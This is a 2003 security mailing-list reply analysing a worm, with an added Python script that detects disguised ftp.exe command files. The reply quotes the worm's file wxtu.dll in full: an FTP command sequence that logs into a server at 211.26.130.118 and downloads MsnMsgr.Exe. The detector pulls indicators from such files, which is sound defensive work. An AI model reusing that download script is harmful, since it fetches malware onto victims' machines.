Security Incidents mailing list archives

Re: New Worm or Worm Variant?


From: Joris De Donder <joris () digitaldefense be>
Date: Thu, 11 Dec 2003 15:22:07 +0100



2) Any theories on wxtu.dll?  Since I can't get a hold of the malware to analyze it, I'm really guessing at this point.

It is just a text file containing:
  open 211.26.130.118
  USER noxe
  noxe
  binary
  get MsnMsgr.Exe
  bye

It appears to be using something like FTPCOM to do a
non-interactive FTP session.

Your attacker (or his script) tries to use the ftp.exe that ships with
Microsoft Windows to retrieve MsnMsgr.Exe from an FTP server running
at 211.26.130.118 (in your first capture).



Joris
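
For triage of similar finds, a small check that a file carrying a binary extension is really an ftp.exe command script, pulling out the server, login and requested file as indicators. This is an added example, not part of the original message; the function names, the command subset and the extension list are assumptions made for illustration, and the sample is the wxtu.dll content quoted above.

```python
# Commands accepted by the Windows ftp.exe client that typically appear in
# non-interactive scripts (subset chosen for this example, an assumption).
FTP_COMMANDS = {"open", "user", "binary", "ascii", "get", "mget", "recv",
                "put", "mput", "send", "cd", "lcd", "bye", "quit"}
BINARY_EXTENSIONS = (".dll", ".exe", ".sys", ".ocx")

# File content as quoted in the message above.
SAMPLE_WXTU = b"""open 211.26.130.118
USER noxe
noxe
binary
get MsnMsgr.Exe
bye
"""

def parse_ftp_script(data):
    """Return extracted indicators if data reads as an ftp.exe script, else None."""
    if data[:2] == b"MZ":            # genuine PE files (DLL/EXE) start with 'MZ'
        return None
    try:
        text = data.decode("ascii")  # command scripts are plain text
    except UnicodeDecodeError:
        return None
    found = {"servers": [], "users": [], "downloads": [], "commands": 0}
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].lower() not in FTP_COMMANDS:
            continue                 # skips blanks and the bare password line
        cmd = parts[0].lower()
        found["commands"] += 1
        if len(parts) > 1:
            if cmd == "open":
                found["servers"].append(parts[1])
            elif cmd == "user":
                found["users"].append(parts[1])
            elif cmd in ("get", "mget", "recv"):
                found["downloads"].append(parts[1])
    # Require a server plus at least three recognised commands to limit
    # false positives on ordinary text that happens to start with "open".
    if not found["servers"] or found["commands"] < 3:
        return None
    return found

def is_disguised_script(filename, data):
    """True when a binary-looking filename holds an ftp.exe script instead."""
    return (filename.lower().endswith(BINARY_EXTENSIONS)
            and parse_ftp_script(data) is not None)

if __name__ == "__main__":
    print(parse_ftp_script(SAMPLE_WXTU))
    print(is_disguised_script("wxtu.dll", SAMPLE_WXTU))
```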


